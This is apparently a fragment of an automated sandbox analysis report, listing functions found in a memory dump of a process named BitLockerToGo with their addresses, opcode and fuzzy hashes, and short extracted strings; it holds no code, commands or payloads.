Download Yara Rule

Strings

4`[b, xrefs: 02B0DCB0

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: 8e8eb153df4c8e67d0e3ff1b215814dd36108c8ca08be612a2beac6aa0d9f401
Instruction ID: 82423cc575954ef20ef0ef30349d08ea7b08d72db2e367185a2dc2336bc3ff48
Opcode Fuzzy Hash: 8e8eb153df4c8e67d0e3ff1b215814dd36108c8ca08be612a2beac6aa0d9f401
Instruction Fuzzy Hash: 4551C270A08342ABD722EB58C8D0A2ABFF6EF95345F588C5CE5C5872D1D731D824CB52

Function 02B16080 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

%&' , xrefs: 02B15EE3, 02B15EEB

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: 15d91d504c069e455ef2087ac3ace83bbbbaf3f2ac626100fecf6a9841814ea9
Instruction ID: 3193a6ee02df78f0fb1c741534a723f623296e771650394d60c8184e4066bf57
Opcode Fuzzy Hash: 15d91d504c069e455ef2087ac3ace83bbbbaf3f2ac626100fecf6a9841814ea9
Instruction Fuzzy Hash: C341CD70D08245DFDB24CF94D980ABFBBB9EF8A305F944899E585A7241D3309854CBA2

Function 02AF34D0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

N967, xrefs: 02AF36A1

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: N967
API String ID: 0-1083447927
Opcode ID: ea6084bc36f7a24ca9c17baf4a751d60f4f1dceea07d8688cfe3ddb644291ba4
Instruction ID: 03ea4c0acfa2cc343b91974c183dc4ef2ecaff939c28423b3fbd3b614e1a2629
Opcode Fuzzy Hash: ea6084bc36f7a24ca9c17baf4a751d60f4f1dceea07d8688cfe3ddb644291ba4
Instruction Fuzzy Hash: 725120B04083809FD750DF54C480A2BBBF5EF9A798F109A4DF5D48B261E739D944CB96

Function 02B19000 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

%&' , xrefs: 02B19034, 02B1903D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: 07ec1014866716447a808b0ab864283dcc7b085880d8d4d3a4e15dbdda387c88
Instruction ID: a17e2fba62f73a8144d75d423e611c1346e7cd6b260d9ba2272cf54d5e13aa83
Opcode Fuzzy Hash: 07ec1014866716447a808b0ab864283dcc7b085880d8d4d3a4e15dbdda387c88
Instruction Fuzzy Hash: CF41CF34A08380AFD724DE14D8A4B2BB7F6EF85754F94885CF58987241D331E8A4CB52

Function 02B19190 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

%&' , xrefs: 02B191C4, 02B191CD

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: a92cac41bfb6d16bb81a811746cee2a6d2efc4a47fce9fce30cd602c25491317
Instruction ID: 123510a733786f6a64cc6422509063e862c053db3585420176fd553c613d20c9
Opcode Fuzzy Hash: a92cac41bfb6d16bb81a811746cee2a6d2efc4a47fce9fce30cd602c25491317
Instruction Fuzzy Hash: D7418E34648380AFD728DF54D8A0B2BB7F6EF85754FA4886CE5C997281D331E814CB96

Function 02ADBB40 Relevance: .8, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc28419ac998b853b8f5b7822dddedc2d4859311e267903561888dbf11bfb68d
Instruction ID: d7134abd5b3c8affedb275c7fde730b80c72580f9288ab35c495772748895189
Opcode Fuzzy Hash: cc28419ac998b853b8f5b7822dddedc2d4859311e267903561888dbf11bfb68d
Instruction Fuzzy Hash: 2D42E3325083118BC725DF28E4803BAB3E2FFC4318F59892ED9D797285DB35A955CB92

Function 02ADB030 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc20f505c08c5bf7c18bb747b06e73417c21ac9efcb617ca73bd31693c2267f3
Instruction ID: f68e21dcf7638b6cd508930578a0c36b4515215e82fe593ef6b0406cd42c922c
Opcode Fuzzy Hash: bc20f505c08c5bf7c18bb747b06e73417c21ac9efcb617ca73bd31693c2267f3
Instruction Fuzzy Hash: 8452B4B09087848FE735CB24C4847A7BBE1EB8131CF165D2DC5EB06B82DB79A585C762

Function 02AD6FA0 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae8be45ecc265ad60dfef65d51db6f81b30ca3366c9e29a2f55b73bdeaccbd7
Instruction ID: ee956a88745a17ca18db8b7eee9f8a49a7f44a5de040dd1e13017936d76ad3d2
Opcode Fuzzy Hash: 0ae8be45ecc265ad60dfef65d51db6f81b30ca3366c9e29a2f55b73bdeaccbd7
Instruction Fuzzy Hash: 9352C0315083458FC719CF29C4D06AAFBE1BF88318F598A6DF89A57351DB34E989CB81

Function 02AD79A0 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ec9a69b78c6806acb0cdb5177ae1a6a6503a3c9645dd0b53d46a04722d3e6e
Instruction ID: 671448c00184795ebf7158505f6b213a530c13235294aae3ee522d1fa0470a46
Opcode Fuzzy Hash: 10ec9a69b78c6806acb0cdb5177ae1a6a6503a3c9645dd0b53d46a04722d3e6e
Instruction Fuzzy Hash: 9A32F070515B118FC378CF29C99066AFBF2BF45610B905A2ED6A78BB90DB36F845CB10

Function 02AFDD67 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f733a2303b137055065734c11e2aad6d49fb20e21a38f9d0682d3bc134183da
Instruction ID: 5560a27c49c39f14419c75f0f6d03a3a932e613543ea2e906a1370e92042a25f
Opcode Fuzzy Hash: 4f733a2303b137055065734c11e2aad6d49fb20e21a38f9d0682d3bc134183da
Instruction Fuzzy Hash: E3F113B18083419FD724CF68C49065BBBE2AF95314F04896DF9D98B392DB39D909CB53

Function 02AD9FC0 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899da61d4a4344b3584b10c309c1621e2107f7b3ee253ef316529013dd7b837d
Instruction ID: ac45ffabc39a331ea02518468fca55bcc1dc5ecf7cd53a37f0e871fd67340b97
Opcode Fuzzy Hash: 899da61d4a4344b3584b10c309c1621e2107f7b3ee253ef316529013dd7b837d
Instruction Fuzzy Hash: 24F1CE756483418FC324CF29C88066BFBE2AFC9304F48982DE4CA87752EB75E844CB56

Function 02AFC1CD Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2582b65c72be482fa3011dd49a3416e748cec85ba580c14030772af78eeddfd8
Instruction ID: 986e9b3b5e3cb678396402c912cef14f13abec1fff8f14b17d47add28afb59a1
Opcode Fuzzy Hash: 2582b65c72be482fa3011dd49a3416e748cec85ba580c14030772af78eeddfd8
Instruction Fuzzy Hash: D3E12732E102558FDB14CF7DC89039DB7A3AF8A330F1983AAE565A72D1D7349D558B80

Function 02AD8DA0 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110f068bc06babf526428a8ca7220cffdb511a7bed330cda058068d4026cfc7d
Instruction ID: 946b2fdad1b309aaf8bb191a28effd7a9a6d5c7ec650c35a37424354671dca36
Opcode Fuzzy Hash: 110f068bc06babf526428a8ca7220cffdb511a7bed330cda058068d4026cfc7d
Instruction Fuzzy Hash: ABF18A75A18302CFE708CF24E49179AB7E2FF88359F49896DE84A87280D735E955CF42

Function 02AFAA90 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96e8f705f8ca61067bcfa6f52ba7075ceec16d6c65b95218e4d0edca7134d703
Instruction ID: 112b442cb5923cd43c0f1e4f3bb39f0063cd608945f332f333b381e2ade09c1e
Opcode Fuzzy Hash: 96e8f705f8ca61067bcfa6f52ba7075ceec16d6c65b95218e4d0edca7134d703
Instruction Fuzzy Hash: D1B1D171A083018FD754DF98C8907ABB7E6EF85354F04882CF6C98B252EB39D945CB92

Function 02B1618A Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4c3e2d0b56908a93c652a9b695c695113c64ebe812d092e7aa0c4a92822f58
Instruction ID: 27addbe4ee668b57744efa67e6133777ae7007414fd05bc1572eab4ba3e5deae
Opcode Fuzzy Hash: ca4c3e2d0b56908a93c652a9b695c695113c64ebe812d092e7aa0c4a92822f58
Instruction Fuzzy Hash: DAC11776A58311CFC728CF28D49126AB7E6FB89354F0A4EADD895C3381D738D958CB81

Function 02B18120 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3dc222790e29fffafe299cbd21ddc32123f3c8370b7502b5ae34384ed8a2b8
Instruction ID: 84f12ec1465e87562f6faedd70a8f2c9b7e2f80f856a72fbae5cf652296af05e
Opcode Fuzzy Hash: ab3dc222790e29fffafe299cbd21ddc32123f3c8370b7502b5ae34384ed8a2b8
Instruction Fuzzy Hash: EAB18A716082419FD304EF28E590A2EFBE2FF8A305F598DADE4D583251D735E824CB92

Function 02ADABA0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7805861dcd186361dfe2ebe0cbac01867076507d20abb4575bc8bd1e16d54128
Instruction ID: 11d0dbee2ff57b99d9ce7238ee78d72c31f888e8b5dab937b5819ce38b7f2b5c
Opcode Fuzzy Hash: 7805861dcd186361dfe2ebe0cbac01867076507d20abb4575bc8bd1e16d54128
Instruction Fuzzy Hash: 17C14DB29487418FC360CF68DC867ABB7F1BF85318F08492DD1DAC6242EB78A155CB46

Function 02AE2324 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 300bb9d8bd687b18680fba4ab17ea82e958c5c3b943d6f983d0f9339f81959a3
Instruction ID: 0489f4097319a4f04dc4b8a88ea320a20034b03f683308554657c2efb4d4bd08
Opcode Fuzzy Hash: 300bb9d8bd687b18680fba4ab17ea82e958c5c3b943d6f983d0f9339f81959a3
Instruction Fuzzy Hash: 76B1817558A380DBF631A7149944FEFB6F6BFC5304F08092CE48A57282DB769506CB63

Function 02AFDB9C Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb590839b0da402e2421349866ffca18f9618a949301a0a30729d0efe936202a
Instruction ID: 16df2c756ec9d446266dbf817e577db8d112e165e8ed41cf4644ec039ad6b592
Opcode Fuzzy Hash: fb590839b0da402e2421349866ffca18f9618a949301a0a30729d0efe936202a
Instruction Fuzzy Hash: 9781E1719083419FD724CF68C490B5BBBE2AF95314F148A6DF5D98B292EB39C809CF52

Function 02B13840 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838603de208fba0b4e26be5c295e699aa4010e5af8054041a69bee02f682f0f7
Instruction ID: 8255d03dee558827db3ca728eac4b6c334d22bf96dbc96e70fa87469fca3d883
Opcode Fuzzy Hash: 838603de208fba0b4e26be5c295e699aa4010e5af8054041a69bee02f682f0f7
Instruction Fuzzy Hash: 4F71E271A083409FD710CF28C880B2EBBE6EFC5314F59899CE9D9872A5E731E855CB42

Function 02B17E90 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab225d0c12a00bae6f375b133aaa906a6f94bc17dd4e9fcb95de3c5d1f12076
Instruction ID: 202d934bdff4a519845c9610d97715b23f42af049617466e97f036b53c1b9f86
Opcode Fuzzy Hash: aab225d0c12a00bae6f375b133aaa906a6f94bc17dd4e9fcb95de3c5d1f12076
Instruction Fuzzy Hash: 37619775A18201CFD710CF58E4A0A2EF7F5FB8A355F5A88A8E595A3701C338E864CF91

Function 02B0D240 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction ID: 986dd682ba7af85b4f996ff1e577fe72647e7f04def6e93b7dbe7ca75d32881d
Opcode Fuzzy Hash: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction Fuzzy Hash: 315137B16087548FE314DF69D89435BBBE1FB88318F144A2DE4E987390E379D6088B82

Function 02B12660 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ef1220d2833add138854a2f345cf4d7a6040ab97bf7108732bf7eaf43658bd
Instruction ID: 2a521899ec6b326842250d106f59c7b3c26b15c7e86cec87ca110614e1926eba
Opcode Fuzzy Hash: 86ef1220d2833add138854a2f345cf4d7a6040ab97bf7108732bf7eaf43658bd
Instruction Fuzzy Hash: AD51A174A082109FD725DF54D980A2BBBF6EF95348F5488ACE8C987351D731EC24CB62

Function 02AD5710 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15cbd8248b4e6de2cb465da1b1765bb0527116926e0dc8f746f54a456c0f8a80
Instruction ID: c14c634d13678386b53945a881293414806583b3df2de40c15b35f1afc892c19
Opcode Fuzzy Hash: 15cbd8248b4e6de2cb465da1b1765bb0527116926e0dc8f746f54a456c0f8a80
Instruction Fuzzy Hash: E2518075E04210DFC724DF68C88092AB7E2FF85324F954A6DE85A8B351EB31EC41CB92

Function 02AE0F20 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fc7a28a755c2bc98263508083291689bf166f84fef1900ce7fec599393d18b
Instruction ID: 1c85ffc053a105fcead5800dfc4e60437f16c8f023b468a4c158273278f75787
Opcode Fuzzy Hash: c0fc7a28a755c2bc98263508083291689bf166f84fef1900ce7fec599393d18b
Instruction Fuzzy Hash: 5741467260C3940FD718DE3A8C9426A7BD2ABC5210F09C63EF0E6863C4EB74C61AD751

Function 02B18460 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f63f5b27a259685f7f8d557ded40a6030a76d4eabddaae729d79b9d19835df
Instruction ID: 738012a2f6ba5a62a9bda726a21cdd85a76de7b384542c9083bbd926cffbc8f1
Opcode Fuzzy Hash: 42f63f5b27a259685f7f8d557ded40a6030a76d4eabddaae729d79b9d19835df
Instruction Fuzzy Hash: 38315C74A09344EBC700AF28E594A6EF7F5FB86605F498C6DE8C883201D335D854CB56

Function 02AD6BF0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526342539c8c1ada43a5fc3033673f8f3cf8b6f81b828a329b9df3a1e0906718
Instruction ID: 5ea9e56840b089f3f37aa5e2bff4a4b5ccf67e7e89cfdd72fd63917a29fce239
Opcode Fuzzy Hash: 526342539c8c1ada43a5fc3033673f8f3cf8b6f81b828a329b9df3a1e0906718
Instruction Fuzzy Hash: 8A11E737F6462507E350CE7AE8C8A166356EBCA51970A0938EA82D7302CF22E412C150

Function 02B09980 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: e40ec64b759febc54ec4c38bc40d630f0a9acf74de41654fcc8c860fc7d3e226
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4511C233A055D40EC3178D3D8880565BFA34BD3978F5983D9E4B89B2D3D622898AC355

Function 02AFF4B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edad381a871012efd74b712fea6fb40d70a2cd9c39da1291d7c245a79cfd1e26
Instruction ID: 65ba44f55b2e9958b742cf61d952ecfe1d6eb9b7fa89a3a083cf14c498bf4b23
Opcode Fuzzy Hash: edad381a871012efd74b712fea6fb40d70a2cd9c39da1291d7c245a79cfd1e26
Instruction Fuzzy Hash: 6801D8F66003015BDB309F9895C0727F2AB7F81718F18542CEA09D7781EF79E805CAA1

Function 02ADEC76 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2b6f0e511fb73899bc6972f018fc161d1dfffd9b36224ce90d68ed8c49f1a4
Instruction ID: 77f8a6698eaa91583e8f5a851f502730e45d70e5d1195ffd16e80e0cab008768
Opcode Fuzzy Hash: 1e2b6f0e511fb73899bc6972f018fc161d1dfffd9b36224ce90d68ed8c49f1a4
Instruction Fuzzy Hash: 054198B406D7809FD6609F06A58425EBFF1BBC6784F60AE0CE2E92A728D774C541CF46

Function 02AE9FB0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514589fca501f5db6df89bfef13271a11ef244346181a24e6bf76f9ce65de1e7
Instruction ID: 78825f111edc86af0affd4cb454cafdfa22d0f526e15b5041a8f96c911716b77
Opcode Fuzzy Hash: 514589fca501f5db6df89bfef13271a11ef244346181a24e6bf76f9ce65de1e7
Instruction Fuzzy Hash: 65F0ECB26043216BDF228A599CC0F77BB9CCB87314F191416E84657102D5715446C3E7

Function 02B0FFC0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction ID: 3624b77682ee83a1f7280ae798aa6870ad43fab9d5b934cbcd3197c76f6b32a4
Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction Fuzzy Hash: 76E0C237B0522106A774CE369C01677F3E2EBC7715F4D946EE042D3248D638C4418265

Function 02AFD541 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d03400e498563c15c714fa933aa6afe5943d8bcc04bde2d60de6fa899b2527
Instruction ID: e3cd3bf4dd3d1fbdb95ad773ceece18b70b04994eb72a1cfe3100c836007d183
Opcode Fuzzy Hash: 02d03400e498563c15c714fa933aa6afe5943d8bcc04bde2d60de6fa899b2527
Instruction Fuzzy Hash: 92C08CB4C88240D6E0205D10BB01675F1336307229F003820900E63502E922D924C947

Function 02AFD260 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87c2e4f126df2fdbd24c20231aec4d8355c217aadb62736c58c656dbff13557
Instruction ID: 54ed94e27e915e40f980d93898f085abe86cf83a5f34ba0b3326566f41817cf0
Opcode Fuzzy Hash: f87c2e4f126df2fdbd24c20231aec4d8355c217aadb62736c58c656dbff13557
Instruction Fuzzy Hash: 48C08C30864708E6CB20BF08C0412F1F330B7463B4F10E324E828670C59B38EA1CCA9D

Function 02AE0785 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab845459ee24d071e55200cd74edd0c4b073df04110eef9137b2048b30c0a71
Instruction ID: c7c133324a08e5061819812458b53548a9a6c8dfc583b8fdfa187c38d60fd565
Opcode Fuzzy Hash: bab845459ee24d071e55200cd74edd0c4b073df04110eef9137b2048b30c0a71
Instruction Fuzzy Hash: 38B00230C89711FB82271F28A9084ADB6B5AA17292B413C94E405639008F3896A58A5E

Function 02B06B52 Relevance: 71.9, APIs: 1, Strings: 40, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02B06C09

Strings

S, xrefs: 02B06C52
+, xrefs: 02B06DFA
}, xrefs: 02B06CE2
!, xrefs: 02B06DAA
$, xrefs: 02B06C82
_, xrefs: 02B06C32
T, xrefs: 02B06E02
U, xrefs: 02B06E0A
?, xrefs: 02B06D5A
7, xrefs: 02B06D1A
y, xrefs: 02B06CD2
W, xrefs: 02B06D52
', xrefs: 02B06D9A
~, xrefs: 02B06CC2
K, xrefs: 02B06DE2
[, xrefs: 02B06C62
u, xrefs: 02B06D02
/, xrefs: 02B06DDA
), xrefs: 02B06DEA
[, xrefs: 02B06D32
@, xrefs: 02B06DC2
, xrefs: 02B06CA2
B, xrefs: 02B06D42
-, xrefs: 02B06DCA
c, xrefs: 02B06C22
f, xrefs: 02B06C72
,, xrefs: 02B06C92
L, xrefs: 02B06CB2
0, xrefs: 02B06EB1
*, xrefs: 02B06CF2
9, xrefs: 02B06D6A
%, xrefs: 02B06D8A
5, xrefs: 02B06D0A
V, xrefs: 02B06D92
3, xrefs: 02B06D3A
